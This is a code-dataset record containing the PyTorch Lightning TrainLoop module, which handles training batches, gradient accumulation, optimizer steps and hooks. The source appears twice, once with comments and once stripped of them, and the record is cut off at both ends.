AttributeDict(signal=-1, grad_norm_dic=grad_norm_dic) # hook response = self.trainer.call_hook("on_train_batch_start", batch, batch_idx, dataloader_idx) if response == -1: return AttributeDict(signal=-1, grad_norm_dic=grad_norm_dic) # lightning module hook splits = self.tbptt_split_batch(batch) for split_idx, split_batch in enumerate(splits): # create an iterable for optimizers and loop over them for opt_idx, optimizer in self.prepare_optimizers(): # toggle model params + set info to logger_connector self.run_train_split_start(split_idx, split_batch, opt_idx, optimizer) if self.should_accumulate(): # For gradient accumulation # ------------------- # calculate loss (train step + train step end) # ------------------- # perform dpp sync only when performing optimizer_step with self.block_ddp_sync_behaviour(): self.training_step_and_backward(split_batch, batch_idx, opt_idx, optimizer, self.trainer.hiddens) batch_outputs = self._process_closure_result( batch_outputs=batch_outputs, opt_idx=opt_idx, ) # ------------------------------ # BACKWARD PASS # ------------------------------ # gradient update with accumulated gradients else: if self.automatic_optimization: def train_step_and_backward_closure(): result = self.training_step_and_backward( split_batch, batch_idx, opt_idx, optimizer, self.trainer.hiddens ) return None if result is None else result.loss # optimizer step self.optimizer_step(optimizer, opt_idx, batch_idx, train_step_and_backward_closure) else: self._curr_step_result = self.training_step( split_batch, batch_idx, opt_idx, self.trainer.hiddens ) if self._curr_step_result is None: # user decided to skip optimization # make sure to zero grad. 
self.zero_grad_handler(batch_idx, optimizer, opt_idx) continue batch_outputs = self._process_closure_result( batch_outputs=batch_outputs, opt_idx=opt_idx, ) # todo: Properly aggregate grad_norm accros opt_idx and split_idx grad_norm_dic = self._cur_grad_norm_dict self._cur_grad_norm_dict = None # hook + clear gradients self.zero_grad_handler(batch_idx, optimizer, opt_idx) # update running loss + reset accumulated loss self.update_running_loss() result = AttributeDict( signal=0, grad_norm_dic=grad_norm_dic, training_step_output_for_epoch_end=batch_outputs, ) return result @contextmanager def block_ddp_sync_behaviour(self): if isinstance(self.trainer.model, torch.nn.parallel.DistributedDataParallel): yield self.trainer.model.no_sync() else: yield def _process_closure_result( self, batch_outputs: list, opt_idx: int ) -> list: opt_closure_result = self._curr_step_result if opt_closure_result is not None: # cache metrics self.trainer.logger_connector.cache_training_step_metrics(opt_closure_result) # track hiddens self.trainer.hiddens = self.process_hiddens(opt_closure_result) # check if loss or model weights are nan if self.trainer.terminate_on_nan: self.trainer.detect_nan_tensors(opt_closure_result.loss) # track all the outputs across all steps batch_opt_idx = opt_idx if len(batch_outputs) > 1 else 0 batch_outputs[batch_opt_idx].append(opt_closure_result.training_step_output_for_epoch_end) if self.automatic_optimization: # track total loss for logging (avoid mem leaks) self.accumulated_loss.append(opt_closure_result.loss) self._curr_step_result = None return batch_outputs def training_step_and_backward(self, split_batch, batch_idx, opt_idx, optimizer, hiddens): """ wrap the forward step in a closure so second order methods work """ # lightning module hook result = self.training_step(split_batch, batch_idx, opt_idx, hiddens) self._curr_step_result = result if result is None: self.warning_cache.warn("training_step returned None if it was on purpose, ignore this 
warning...") return None if self.trainer.train_loop.automatic_optimization: # backward pass with self.trainer.profiler.profile("model_backward"): self.backward(result, optimizer, opt_idx) # hook - call this hook only # when gradients have finished to accumulate if not self.should_accumulate(): self.on_after_backward(result.training_step_output, batch_idx, result.loss) # check if loss or model weights are nan if self.trainer.terminate_on_nan: self.trainer.detect_nan_tensors(result.loss) return result def backward(self, result, optimizer, opt_idx, *args, **kwargs): self.trainer.dev_debugger.track_event("backward_call") # backward can be called manually in the training loop if isinstance(result, torch.Tensor): self.trainer.accelerator_backend.backward(result, optimizer, opt_idx, *args, **kwargs) else: result.closure_loss = self.trainer.accelerator_backend.backward( result.closure_loss, optimizer, opt_idx, *args, **kwargs ) if not self.should_accumulate(): # track gradients self.track_and_norm_grad(optimizer=optimizer) def update_train_loop_lr_schedulers(self, monitor_metrics=None): num_accumulated_batches_reached = self._accumulated_batches_reached() num_training_batches_reached = self._num_training_batches_reached() if num_accumulated_batches_reached or num_training_batches_reached: # update lr self.trainer.optimizer_connector.update_learning_rates(interval="step", monitor_metrics=monitor_metrics) def run_on_epoch_end_hook(self, epoch_output): self.trainer.call_hook('on_epoch_end') self.trainer.call_hook('on_train_epoch_end', epoch_output) self.trainer.logger_connector.on_train_epoch_end() def increment_accumulated_grad_global_step(self): num_accumulated_batches_reached = self._accumulated_batches_reached() num_training_batches_reached = self._num_training_batches_reached() # progress global step according to grads progress if num_accumulated_batches_reached or num_training_batches_reached: self.trainer.global_step += 1 def _accumulated_batches_reached(self): return 
(self.trainer.batch_idx + 1) % self.trainer.accumulate_grad_batches == 0 def _num_training_batches_reached(self): return (self.trainer.batch_idx + 1) == self.trainer.num_training_batches def should_accumulate(self): # checks if backward or backward + optimizer step (via closure) accumulation_done = self._accumulated_batches_reached() is_final_batch = self._num_training_batches_reached() return not (accumulation_done or is_final_batch) def should_check_val_fx(self, batch_idx, is_last_batch): # decide if we should run validation is_val_check_batch = (batch_idx + 1) % self.trainer.val_check_batch == 0 is_val_check_epoch = (self.trainer.current_epoch + 1) % self.trainer.check_val_every_n_epoch == 0 can_check_val = self.trainer.enable_validation and is_val_check_epoch should_check_val = is_val_check_batch or self.trainer.should_stop is_last_batch_for_infinite_dataset = is_last_batch and self.trainer.val_check_batch == float("inf") should_check_val = can_check_val and (should_check_val or is_last_batch_for_infinite_dataset) return should_check_val def build_train_args(self, batch, batch_idx, opt_idx, hiddens): # enable not needing to add opt_idx to training_step args = [batch, batch_idx] if len(self.trainer.optimizers) > 1: if self.trainer.has_arg("training_step", "optimizer_idx"): args.append(opt_idx) else: num_opts = len(self.trainer.optimizers) raise ValueError( f"Your LightningModule defines {num_opts} optimizers but " f'training_step is missing the "optimizer_idx" argument.' 
) # pass hiddens if using tbptt if self.trainer.truncated_bptt_steps is not None: args.append(hiddens) return args def save_loggers_on_train_batch_end(self): # when loggers should save to disk should_flush_logs = self.trainer.logger_connector.should_flush_logs if should_flush_logs or self.trainer.fast_dev_run: if self.trainer.is_global_zero and self.trainer.logger is not None: self.trainer.logger.save() def process_train_step_outputs(self, all_train_step_outputs, early_stopping_accumulator, checkpoint_accumulator): """ Figure out what needs to be tracked/logged at the end of the epoch """ # the training step outputs a list per optimizer. The list contains the outputs at each time step # when no TBPTT is used, then the list has 1 item per batch # when TBPTT IS used, then the list has n items (1 per time step) epoch_end_outputs = [] for optimizer_idx_outputs in all_train_step_outputs: # extract one representative sample from each time step (1 if no tbptt) and 0th optimizer if len(optimizer_idx_outputs) == 0: continue sample_output = optimizer_idx_outputs[-1] # pull out callback info if available (ie: Results object) if isinstance(sample_output, dict) and "early_stop_on" in sample_output: early_stopping_accumulator.accumulate(sample_output["early_stop_on"]) if isinstance(sample_output, dict) and "checkpoint_on" in sample_output: checkpoint_accumulator.accumulate(sample_output["checkpoint_on"]) # decide if we need to reduce at the end of the epoch automatically auto_reduce_tng_result = isinstance(sample_output, Result) and sample_output.should_reduce_on_epoch_end # only track when a) it needs to be autoreduced OR b) the user wants to manually reduce on epoch end if is_overridden("training_epoch_end", model=self.trainer.get_model()) or auto_reduce_tng_result: epoch_end_outputs.append(optimizer_idx_outputs) return epoch_end_outputs def prepare_optimizers(self): # in manual optimization we loop over all optimizers at once optimizers = self.get_optimizers_iterable() if not 
self.automatic_optimization: optimizers = [optimizers[0]] return optimizers def run_train_split_start(self, split_idx, split_batch, opt_idx, optimizer): # set split_idx to trainer for tracking self.trainer.split_idx = split_idx # make sure only the gradients of the current optimizer's parameters are calculated # in the training step to prevent dangling gradients in multiple-optimizer setup. if self.automatic_optimization and len(self.trainer.optimizers) > 1: model = self.trainer.get_model() model.toggle_optimizer(optimizer, opt_idx) # use to track metrics internally self.trainer.logger_connector.on_train_split_start(split_idx, opt_idx, split_batch) def update_running_loss(self): accumulated_loss = self.accumulated_loss.mean() if accumulated_loss is not None: # calculate running loss for display self.running_loss.append(self.accumulated_loss.mean() * self.trainer.accumulate_grad_batches) # reset for next set of accumulated grads self.accumulated_loss.reset() def zero_grad_handler(self, batch_idx, optimizer, opt_idx): if self.automatic_optimization: # hook self.on_before_zero_grad(optimizer) optimizers = enumerate([optimizer]) else: optimizers = self.get_optimizers_iterable() for idx, optimizer in optimizers: self.optimizer_zero_grad(batch_idx, optimizer, opt_idx)
41.995798
121
0.654402
from contextlib import contextmanager from copy import copy, deepcopy import numpy as np import torch import torch.distributed as torch_distrib from pytorch_lightning.callbacks import ModelCheckpoint from pytorch_lightning.core.lightning import LightningModule from pytorch_lightning.core.memory import ModelSummary from pytorch_lightning.core.step_result import EvalResult, Result from pytorch_lightning.trainer.states import TrainerState from pytorch_lightning.trainer.supporters import TensorRunningAccum, Accumulator from pytorch_lightning.utilities import parsing, AMPType from pytorch_lightning.utilities.distributed import rank_zero_info, rank_zero_warn from pytorch_lightning.utilities.exceptions import MisconfigurationException from pytorch_lightning.utilities.memory import recursive_detach from pytorch_lightning.utilities.model_utils import is_overridden from pytorch_lightning.utilities.parsing import AttributeDict from pytorch_lightning.utilities.warning_utils import WarningCache class TrainLoop: def __init__(self, trainer): self.trainer = trainer self.early_stopping_accumulator = None self.checkpoint_accumulator = None self.accumulated_loss = None self.warning_cache = WarningCache() self._teardown_already_run = False self.running_loss = TensorRunningAccum(window_length=20) self.automatic_optimization = True self._curr_step_result = None self._cur_grad_norm_dict = None def on_trainer_init( self, max_epochs, min_epochs, max_steps, min_steps, num_sanity_val_steps, automatic_optimization ): self.trainer.global_step = 0 self.trainer.current_epoch = 0 self.trainer.interrupted = False self.trainer.should_stop = False self.trainer._state = TrainerState.INITIALIZING self.trainer.total_batch_idx = 0 self.trainer.batch_idx = 0 self.trainer.num_training_batches = 0 self.trainer.train_dataloader = None self.automatic_optimization = automatic_optimization self.trainer.max_epochs = max_epochs self.trainer.min_epochs = min_epochs self.trainer.max_steps = max_steps 
self.trainer.min_steps = min_steps if num_sanity_val_steps == -1: self.trainer.num_sanity_val_steps = float("inf") else: self.trainer.num_sanity_val_steps = num_sanity_val_steps @property def num_optimizers(self): num_optimizers = len(self.get_optimizers_iterable()) return num_optimizers def should_skip_training(self): if self.trainer.current_epoch >= self.trainer.max_epochs: return True if self.trainer.limit_train_batches == 0: return True return False def on_train_start(self): if self.trainer.on_gpu and self.trainer.root_gpu is not None: with torch.cuda.device(f"cuda:{self.trainer.root_gpu}"): torch.cuda.empty_cache() self.trainer.call_hook("on_train_start") def setup_fit(self, model, train_dataloader, val_dataloaders, datamodule): self.trainer.model_connector.copy_trainer_model_properties(model) if hasattr(model, "hparams"): parsing.clean_namespace(model.hparams) self.trainer.data_connector.attach_data(model, train_dataloader, val_dataloaders, datamodule) self.trainer.config_validator.verify_loop_configurations(model) def setup_training(self, model: LightningModule): ref_model = model if self.trainer.data_parallel: ref_model = model.module self.trainer.accelerator_backend.dist.rank = self.trainer.global_rank self.trainer.accelerator_backend.dist.device = ref_model.device ref_model.trainer = self.trainer self.trainer.model_connector.copy_trainer_model_properties(ref_model) if self.trainer.amp_backend == AMPType.NATIVE and self.trainer.precision == 16 and not self.trainer.use_tpu: self.trainer.scaler = torch.cuda.amp.GradScaler() if self.trainer.logger is not None: self.trainer.logger.log_hyperparams(ref_model.hparams_initial) self.trainer.logger.log_graph(ref_model) self.trainer.logger.save() self.trainer.accelerator_backend.barrier("setup_training") self.trainer.slurm_connector.register_slurm_signal_handlers() self.trainer.on_pretrain_routine_start(ref_model) if self.trainer.is_function_implemented("on_pretrain_routine_start"): 
ref_model.on_pretrain_routine_start() if self.trainer.is_global_zero and self.trainer.weights_summary is not None and not self.trainer.testing: if self.trainer.weights_summary in ModelSummary.MODES: ref_model.summarize(mode=self.trainer.weights_summary) else: raise MisconfigurationException("weights_summary can be None, " + ", ".join(ModelSummary.MODES)) self.trainer.model = model self.trainer.checkpoint_connector.restore_weights(model) self.trainer.on_pretrain_routine_end(ref_model) if self.trainer.is_function_implemented("on_pretrain_routine_end"): ref_model.on_pretrain_routine_end() def on_train_end(self): if self._teardown_already_run: return self._teardown_already_run = True self.trainer.global_step -= 1 self.check_checkpoint_callback(should_save=True, is_last=True) self.trainer.global_step += 1 self.trainer.call_hook("on_train_end") if self.trainer.logger is not None: self.trainer.logger.finalize("success") if self.trainer.global_rank == 0: self.trainer.profiler.describe() self.trainer.accelerator_backend.on_train_end() if self.trainer.on_gpu: model = self.trainer.get_model() model.cpu() torch.cuda.empty_cache() def check_checkpoint_callback(self, should_save, is_last=False): if should_save and self.trainer.checkpoint_connector.has_trained: checkpoint_callbacks = [c for c in self.trainer.callbacks if isinstance(c, ModelCheckpoint)] if is_last and any(c.save_last for c in checkpoint_callbacks): rank_zero_info("Saving latest checkpoint...") model = self.trainer.get_model() [c.on_validation_end(self.trainer, model) for c in checkpoint_callbacks] def on_train_epoch_start(self, epoch): self.trainer.current_epoch = epoch model = self.trainer.get_model() if self.trainer.reload_dataloaders_every_epoch: self.trainer.reset_train_dataloader(model) try: self.trainer.train_dataloader.sampler.set_epoch(epoch) except Exception: pass self.trainer.accumulation_scheduler.on_epoch_start(self.trainer, self.trainer.get_model()) self.accumulated_loss = 
TensorRunningAccum(window_length=self.trainer.accumulate_grad_batches) self.early_stopping_accumulator = Accumulator() self.checkpoint_accumulator = Accumulator() self.trainer.call_hook("on_epoch_start") self.trainer.call_hook("on_train_epoch_start") def on_train_batch_end(self, epoch_output, epoch_end_outputs, batch, batch_idx, dataloader_idx): self.trainer.call_hook('on_batch_end') self.trainer.call_hook('on_train_batch_end', epoch_end_outputs, batch, batch_idx, dataloader_idx) self.track_epoch_end_reduce_metrics(epoch_output, epoch_end_outputs) self.trainer.logger_connector.on_train_batch_end() def reset_train_val_dataloaders(self, model): if not self.trainer.reload_dataloaders_every_epoch: self.trainer.reset_train_dataloader(model) if self.trainer.val_dataloaders is None and not self.trainer.reload_dataloaders_every_epoch: self.trainer.reset_val_dataloader(model) def track_epoch_end_reduce_metrics(self, epoch_output, epoch_end_outputs): for opt_idx, opt_outputs in enumerate(epoch_end_outputs): if isinstance(opt_outputs, list) and len(opt_outputs) == 1 and not isinstance(opt_outputs[0], Result): opt_outputs = opt_outputs[0] epoch_output[opt_idx].append(opt_outputs) def get_optimizers_iterable(self): if not self.trainer.optimizer_frequencies: # call training_step once per optimizer return list(enumerate(self.trainer.optimizers)) optimizer_freq_cumsum = np.cumsum(self.trainer.optimizer_frequencies) optimizers_loop_length = optimizer_freq_cumsum[-1] current_place_in_loop = self.trainer.total_batch_idx % optimizers_loop_length # find optimzier index by looking for the first {item > current_place} in the cumsum list opt_idx = np.argmax(optimizer_freq_cumsum > current_place_in_loop) return [[opt_idx, self.trainer.optimizers[opt_idx]]] def on_after_backward(self, training_step_output, batch_idx, untouched_loss): is_result_obj = isinstance(training_step_output, Result) if is_result_obj: training_step_output.detach() else: training_step_output.batch_loss = 
training_step_output.batch_loss.detach() # insert after step hook self.trainer.call_hook("on_after_backward") # when in dev debugging track the losses self.trainer.dev_debugger.track_train_loss_history(batch_idx, untouched_loss.detach()) def _check_training_step_output(self, training_step_output): if isinstance(training_step_output, torch.Tensor) and not self.automatic_optimization: if training_step_output.grad_fn is None: # TODO: Find why - RuntimeError: Expected to mark a variable ready only once ... raise MisconfigurationException("In manual optimization, `training_step` should not return a Tensor") def training_step(self, split_batch, batch_idx, opt_idx, hiddens): # give the PL module a result for logging model_ref = self.trainer.get_model() with self.trainer.profiler.profile("model_forward"): args = self.build_train_args(split_batch, batch_idx, opt_idx, hiddens) # manually capture logged metrics model_ref._current_fx_name = 'training_step' training_step_output = self.trainer.accelerator_backend.training_step(args) self.trainer.logger_connector.cache_logged_metrics() self._check_training_step_output(training_step_output) training_step_output = self.trainer.call_hook("training_step_end", training_step_output) training_step_output_for_epoch_end, training_step_output = self._process_training_step_output( training_step_output, split_batch ) is_result_obj = isinstance(training_step_output, Result) if training_step_output_for_epoch_end is None: return None # enable empty loss when using manual opt closure_loss = None untouched_loss = None if self.trainer.train_loop.automatic_optimization: # accumulate loss # (if accumulate_grad_batches = 1 no effect) if is_result_obj: closure_loss = training_step_output.minimize else: closure_loss = training_step_output.batch_loss closure_loss = closure_loss / self.trainer.accumulate_grad_batches # the loss will get scaled for amp. 
avoid any modifications to it untouched_loss = closure_loss.detach().clone() # result result = AttributeDict( closure_loss=closure_loss, loss=untouched_loss, training_step_output=training_step_output, training_step_output_for_epoch_end=training_step_output_for_epoch_end, hiddens=training_step_output.hiddens, ) return result def _process_training_step_output(self, training_step_output, split_batch): training_step_output_for_epoch_end = training_step_output # enable validation_step return None if training_step_output_for_epoch_end is None: return None, None # ----------------------------------------- # process result return (DEPRECATE in 1.0) # ----------------------------------------- if isinstance(training_step_output, Result): training_step_output_for_epoch_end = self._process_result(training_step_output, split_batch) return training_step_output_for_epoch_end, training_step_output # ----------------------------------------- # process hybrid (1.0) # ----------------------------------------- # no need for these checks in 1.0.0 # TODO: remove checks in 1.0.0 is_tensor = isinstance(training_step_output_for_epoch_end, torch.Tensor) is_1_0_output = is_tensor or ("log" not in training_step_output and "progress_bar" not in training_step_output) if is_1_0_output: return self._process_training_step_output_1_0(training_step_output, split_batch) # ----------------------------------------- # process old dict (deprecate 1.0) # ----------------------------------------- training_step_output = self.trainer.process_dict_result(training_step_output, train=True) training_step_output = AttributeDict( batch_loss=training_step_output[0], pbar_on_batch_end=training_step_output[1], log_metrics=training_step_output[2], callback_metrics=training_step_output[3], hiddens=training_step_output[4], ) # if the user decides to finally reduce things in epoch_end, save raw output without graphs if isinstance(training_step_output_for_epoch_end, torch.Tensor): training_step_output_for_epoch_end = 
training_step_output_for_epoch_end.detach() else: training_step_output_for_epoch_end = recursive_detach(training_step_output_for_epoch_end) return training_step_output_for_epoch_end, training_step_output def _process_training_step_output_1_0(self, training_step_output, split_batch): result = self.trainer.get_model()._results loss = None hiddens = None # handle dict return if isinstance(training_step_output, dict): loss = training_step_output.pop("loss", None) hiddens = training_step_output.pop("hiddens", None) result["extra"] = training_step_output # handle scalar return elif isinstance(training_step_output, torch.Tensor): loss = training_step_output result["extra"] = {} # map to results under the hood result.minimize = loss result.hiddens = hiddens # track batch for manual reduction with result result.track_batch_size(len(split_batch)) # track metrics without grads for epoch reduction training_step_output_for_epoch_end = copy(result) training_step_output_for_epoch_end.detach() if self.trainer.move_metrics_to_cpu: training_step_output_for_epoch_end.cpu() # what flows back into the system training_step_output = result return training_step_output_for_epoch_end, training_step_output def _process_result(self, training_step_output, split_batch): training_step_output.track_batch_size(len(split_batch)) m = """ TrainResult and EvalResult were deprecated in 0.9.1 and support will drop in 1.0.0. Use self.log and .write from the LightningModule to log metrics and write predictions. training_step can now only return a scalar (for the loss) or a dictionary with anything you want. 
Option 1: return loss Option 2: return {'loss': loss, 'anything_else': ...} Option 3: return {'loss': loss, 'hiddens': hiddens, 'anything_else': ...} """ rank_zero_warn(m) # don't allow EvalResult in the training_step if isinstance(training_step_output, EvalResult): raise MisconfigurationException( "training_step cannot return EvalResult, " "use a dict or TrainResult instead" ) training_step_output_for_epoch_end = copy(training_step_output) training_step_output_for_epoch_end.detach() return training_step_output_for_epoch_end def optimizer_step(self, optimizer, opt_idx, batch_idx, train_step_and_backward_closure): with self.trainer.profiler.profile("optimizer_step"): self.trainer.accelerator_backend.optimizer_step( optimizer, batch_idx, opt_idx, train_step_and_backward_closure ) def on_before_zero_grad(self, optimizer): self.trainer.call_hook('on_before_zero_grad', optimizer) def optimizer_zero_grad(self, batch_idx, optimizer, opt_idx): self.trainer.accelerator_backend.optimizer_zero_grad(batch_idx, optimizer, opt_idx) def track_and_norm_grad(self, optimizer): grad_norm_dic = self._track_gradient_norm() self.trainer.accelerator_backend.clip_gradients(optimizer) self._cur_grad_norm_dict = grad_norm_dic def _track_gradient_norm(self): grad_norm_dict = {} if (self.trainer.global_step + 1) % self.trainer.log_every_n_steps == 0: if float(self.trainer.track_grad_norm) > 0: model = self.trainer.get_model() grad_norm_dict = model.grad_norm(self.trainer.track_grad_norm) return grad_norm_dict def process_hiddens(self, opt_closure_result): hiddens = opt_closure_result.hiddens if isinstance(opt_closure_result.training_step_output, Result): opt_closure_result.training_step_output_for_epoch_end.drop_hiddens() return hiddens def tbptt_split_batch(self, batch): splits = [batch] if self.trainer.truncated_bptt_steps is not None: model_ref = self.trainer.get_model() with self.trainer.profiler.profile("tbptt_split_batch"): splits = model_ref.tbptt_split_batch(batch, 
self.trainer.truncated_bptt_steps) return splits def run_training_epoch(self): model = self.trainer.get_model() train_dataloader = self.trainer.accelerator_backend.process_dataloader(self.trainer.train_dataloader) epoch_output = [[] for _ in range(self.num_optimizers)] train_dataloader = self.trainer.data_connector.get_profiled_train_dataloader(train_dataloader) dataloader_idx = 0 should_check_val = False for batch_idx, (batch, is_last_batch) in train_dataloader: self.trainer.batch_idx = batch_idx batch_output = self.run_training_batch(batch, batch_idx, dataloader_idx) if batch_output.signal == -1: break epoch_end_outputs = self.process_train_step_outputs( batch_output.training_step_output_for_epoch_end, self.early_stopping_accumulator, self.checkpoint_accumulator, ) self.on_train_batch_end(epoch_output, epoch_end_outputs, batch, batch_idx, dataloader_idx) self.trainer.logger_connector.log_train_step_metrics(batch_output) should_check_val = self.should_check_val_fx(batch_idx, is_last_batch) if should_check_val: self.trainer.run_evaluation(test_mode=False) self.trainer.logger_connector.set_stage("train") self.save_loggers_on_train_batch_end() monitor_metrics = deepcopy(self.trainer.logger_connector.callback_metrics) self.update_train_loop_lr_schedulers(monitor_metrics=monitor_metrics) self.trainer.checkpoint_connector.has_trained = True if self.trainer.max_steps is not None and self.trainer.max_steps == self.trainer.global_step + 1: accumulation_done = self._accumulated_batches_reached() if accumulation_done: break # requested in the batches if self.trainer.should_stop: break self.trainer.total_batch_idx += 1 # stop epoch if we limited the number of training batches if (batch_idx + 1) >= self.trainer.num_training_batches: break # progress global step according to grads progress self.increment_accumulated_grad_global_step() # epoch end hook self.run_on_epoch_end_hook(epoch_output) # log epoch metrics self.trainer.logger_connector.log_train_epoch_end_metrics( 
epoch_output, self.checkpoint_accumulator, self.early_stopping_accumulator, self.num_optimizers ) # when no val loop is present or fast-dev-run still need to call checkpoints self.check_checkpoint_callback(not (should_check_val or is_overridden('validation_step', model))) # increment the global step once # progress global step according to grads progress self.increment_accumulated_grad_global_step() def run_training_batch(self, batch, batch_idx, dataloader_idx): # track grad norms grad_norm_dic = {} # bookkeeping using_results_obj = False self.trainer.hiddens = None # track all outputs across time and num of optimizers batch_outputs = [[] for _ in range(len(self.get_optimizers_iterable()))] if batch is None: return AttributeDict(signal=0, grad_norm_dic=grad_norm_dic) # hook response = self.trainer.call_hook("on_batch_start") if response == -1: return AttributeDict(signal=-1, grad_norm_dic=grad_norm_dic) # hook response = self.trainer.call_hook("on_train_batch_start", batch, batch_idx, dataloader_idx) if response == -1: return AttributeDict(signal=-1, grad_norm_dic=grad_norm_dic) # lightning module hook splits = self.tbptt_split_batch(batch) for split_idx, split_batch in enumerate(splits): # create an iterable for optimizers and loop over them for opt_idx, optimizer in self.prepare_optimizers(): # toggle model params + set info to logger_connector self.run_train_split_start(split_idx, split_batch, opt_idx, optimizer) if self.should_accumulate(): # For gradient accumulation # ------------------- # calculate loss (train step + train step end) # ------------------- # perform dpp sync only when performing optimizer_step with self.block_ddp_sync_behaviour(): self.training_step_and_backward(split_batch, batch_idx, opt_idx, optimizer, self.trainer.hiddens) batch_outputs = self._process_closure_result( batch_outputs=batch_outputs, opt_idx=opt_idx, ) # ------------------------------ # BACKWARD PASS # ------------------------------ # gradient update with accumulated gradients 
else: if self.automatic_optimization: def train_step_and_backward_closure(): result = self.training_step_and_backward( split_batch, batch_idx, opt_idx, optimizer, self.trainer.hiddens ) return None if result is None else result.loss # optimizer step self.optimizer_step(optimizer, opt_idx, batch_idx, train_step_and_backward_closure) else: self._curr_step_result = self.training_step( split_batch, batch_idx, opt_idx, self.trainer.hiddens ) if self._curr_step_result is None: # user decided to skip optimization # make sure to zero grad. self.zero_grad_handler(batch_idx, optimizer, opt_idx) continue batch_outputs = self._process_closure_result( batch_outputs=batch_outputs, opt_idx=opt_idx, ) # todo: Properly aggregate grad_norm accros opt_idx and split_idx grad_norm_dic = self._cur_grad_norm_dict self._cur_grad_norm_dict = None # hook + clear gradients self.zero_grad_handler(batch_idx, optimizer, opt_idx) # update running loss + reset accumulated loss self.update_running_loss() result = AttributeDict( signal=0, grad_norm_dic=grad_norm_dic, training_step_output_for_epoch_end=batch_outputs, ) return result @contextmanager def block_ddp_sync_behaviour(self): if isinstance(self.trainer.model, torch.nn.parallel.DistributedDataParallel): yield self.trainer.model.no_sync() else: yield def _process_closure_result( self, batch_outputs: list, opt_idx: int ) -> list: opt_closure_result = self._curr_step_result if opt_closure_result is not None: # cache metrics self.trainer.logger_connector.cache_training_step_metrics(opt_closure_result) # track hiddens self.trainer.hiddens = self.process_hiddens(opt_closure_result) # check if loss or model weights are nan if self.trainer.terminate_on_nan: self.trainer.detect_nan_tensors(opt_closure_result.loss) # track all the outputs across all steps batch_opt_idx = opt_idx if len(batch_outputs) > 1 else 0 batch_outputs[batch_opt_idx].append(opt_closure_result.training_step_output_for_epoch_end) if self.automatic_optimization: # track total loss 
for logging (avoid mem leaks) self.accumulated_loss.append(opt_closure_result.loss) self._curr_step_result = None return batch_outputs def training_step_and_backward(self, split_batch, batch_idx, opt_idx, optimizer, hiddens): # lightning module hook result = self.training_step(split_batch, batch_idx, opt_idx, hiddens) self._curr_step_result = result if result is None: self.warning_cache.warn("training_step returned None if it was on purpose, ignore this warning...") return None if self.trainer.train_loop.automatic_optimization: # backward pass with self.trainer.profiler.profile("model_backward"): self.backward(result, optimizer, opt_idx) # hook - call this hook only # when gradients have finished to accumulate if not self.should_accumulate(): self.on_after_backward(result.training_step_output, batch_idx, result.loss) # check if loss or model weights are nan if self.trainer.terminate_on_nan: self.trainer.detect_nan_tensors(result.loss) return result def backward(self, result, optimizer, opt_idx, *args, **kwargs): self.trainer.dev_debugger.track_event("backward_call") # backward can be called manually in the training loop if isinstance(result, torch.Tensor): self.trainer.accelerator_backend.backward(result, optimizer, opt_idx, *args, **kwargs) else: result.closure_loss = self.trainer.accelerator_backend.backward( result.closure_loss, optimizer, opt_idx, *args, **kwargs ) if not self.should_accumulate(): # track gradients self.track_and_norm_grad(optimizer=optimizer) def update_train_loop_lr_schedulers(self, monitor_metrics=None): num_accumulated_batches_reached = self._accumulated_batches_reached() num_training_batches_reached = self._num_training_batches_reached() if num_accumulated_batches_reached or num_training_batches_reached: # update lr self.trainer.optimizer_connector.update_learning_rates(interval="step", monitor_metrics=monitor_metrics) def run_on_epoch_end_hook(self, epoch_output): self.trainer.call_hook('on_epoch_end') 
self.trainer.call_hook('on_train_epoch_end', epoch_output) self.trainer.logger_connector.on_train_epoch_end() def increment_accumulated_grad_global_step(self): num_accumulated_batches_reached = self._accumulated_batches_reached() num_training_batches_reached = self._num_training_batches_reached() # progress global step according to grads progress if num_accumulated_batches_reached or num_training_batches_reached: self.trainer.global_step += 1 def _accumulated_batches_reached(self): return (self.trainer.batch_idx + 1) % self.trainer.accumulate_grad_batches == 0 def _num_training_batches_reached(self): return (self.trainer.batch_idx + 1) == self.trainer.num_training_batches def should_accumulate(self): # checks if backward or backward + optimizer step (via closure) accumulation_done = self._accumulated_batches_reached() is_final_batch = self._num_training_batches_reached() return not (accumulation_done or is_final_batch) def should_check_val_fx(self, batch_idx, is_last_batch): # decide if we should run validation is_val_check_batch = (batch_idx + 1) % self.trainer.val_check_batch == 0 is_val_check_epoch = (self.trainer.current_epoch + 1) % self.trainer.check_val_every_n_epoch == 0 can_check_val = self.trainer.enable_validation and is_val_check_epoch should_check_val = is_val_check_batch or self.trainer.should_stop is_last_batch_for_infinite_dataset = is_last_batch and self.trainer.val_check_batch == float("inf") should_check_val = can_check_val and (should_check_val or is_last_batch_for_infinite_dataset) return should_check_val def build_train_args(self, batch, batch_idx, opt_idx, hiddens): # enable not needing to add opt_idx to training_step args = [batch, batch_idx] if len(self.trainer.optimizers) > 1: if self.trainer.has_arg("training_step", "optimizer_idx"): args.append(opt_idx) else: num_opts = len(self.trainer.optimizers) raise ValueError( f"Your LightningModule defines {num_opts} optimizers but " f'training_step is missing the "optimizer_idx" argument.' 
) # pass hiddens if using tbptt if self.trainer.truncated_bptt_steps is not None: args.append(hiddens) return args def save_loggers_on_train_batch_end(self): # when loggers should save to disk should_flush_logs = self.trainer.logger_connector.should_flush_logs if should_flush_logs or self.trainer.fast_dev_run: if self.trainer.is_global_zero and self.trainer.logger is not None: self.trainer.logger.save() def process_train_step_outputs(self, all_train_step_outputs, early_stopping_accumulator, checkpoint_accumulator): # the training step outputs a list per optimizer. The list contains the outputs at each time step # when no TBPTT is used, then the list has 1 item per batch # when TBPTT IS used, then the list has n items (1 per time step) epoch_end_outputs = [] for optimizer_idx_outputs in all_train_step_outputs: # extract one representative sample from each time step (1 if no tbptt) and 0th optimizer if len(optimizer_idx_outputs) == 0: continue sample_output = optimizer_idx_outputs[-1] # pull out callback info if available (ie: Results object) if isinstance(sample_output, dict) and "early_stop_on" in sample_output: early_stopping_accumulator.accumulate(sample_output["early_stop_on"]) if isinstance(sample_output, dict) and "checkpoint_on" in sample_output: checkpoint_accumulator.accumulate(sample_output["checkpoint_on"]) # decide if we need to reduce at the end of the epoch automatically auto_reduce_tng_result = isinstance(sample_output, Result) and sample_output.should_reduce_on_epoch_end # only track when a) it needs to be autoreduced OR b) the user wants to manually reduce on epoch end if is_overridden("training_epoch_end", model=self.trainer.get_model()) or auto_reduce_tng_result: epoch_end_outputs.append(optimizer_idx_outputs) return epoch_end_outputs def prepare_optimizers(self): # in manual optimization we loop over all optimizers at once optimizers = self.get_optimizers_iterable() if not self.automatic_optimization: optimizers = [optimizers[0]] return 
